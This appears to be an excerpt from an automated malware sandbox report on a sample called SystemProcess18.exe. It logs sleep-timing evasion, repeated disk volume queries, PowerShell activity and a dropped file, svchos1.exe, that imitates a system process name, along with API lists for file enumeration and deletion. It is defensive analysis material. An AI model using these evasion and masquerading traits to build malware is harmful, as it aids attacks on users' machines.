Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -224000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -160000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -110000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -123000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -149000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -114000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -107000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -115000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7904	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep count: 7985 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep count: 970 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8184	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764	Thread sleep count: 7789 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568	Thread sleep count: 1469 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6500	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5472	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep count: 7803 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480	Thread sleep count: 1026 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7472	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 5660	Thread sleep count: 80 > 30
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 5660	Thread sleep time: -64000s >= -30000s
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 6684	Thread sleep count: 286 > 30
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 6684	Thread sleep time: -143000s >= -30000s
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 2620	Thread sleep count: 118 > 30
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 2620	Thread sleep time: -94400s >= -30000s
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 6580	Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5404	Thread sleep count: 8162 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5400	Thread sleep count: 1368 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4848	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5808	Thread sleep count: 7585 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068	Thread sleep count: 2013 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5004	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep time: -11068046444225724s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Documents\MM\svchos1.exe	Last function: Thread delayed
Source: C:\Users\Public\Documents\MM\svchos1.exe	Last function: Thread delayed
Source: C:\Users\Public\Documents\MM\svchos1.exe	Last function: Thread delayed
Source: C:\Users\Public\Documents\MM\svchos1.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006E6AD8 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	28_2_006E6AD8
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035EB250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,	28_2_035EB250
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C92B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	28_2_035C92B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C9090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	28_2_035C9090
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C97D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	28_2_035C97D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C9B60 FindFirstFileA,FindClose,FindClose,	28_2_035C9B60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035CBD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	28_2_035CBD60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C9C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,	28_2_035C9C40
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006E6AD8 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	29_2_006E6AD8
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_010529AD FindFirstFileExW,	29_2_010529AD
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030AB250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,	29_2_030AB250
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030892B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	29_2_030892B0
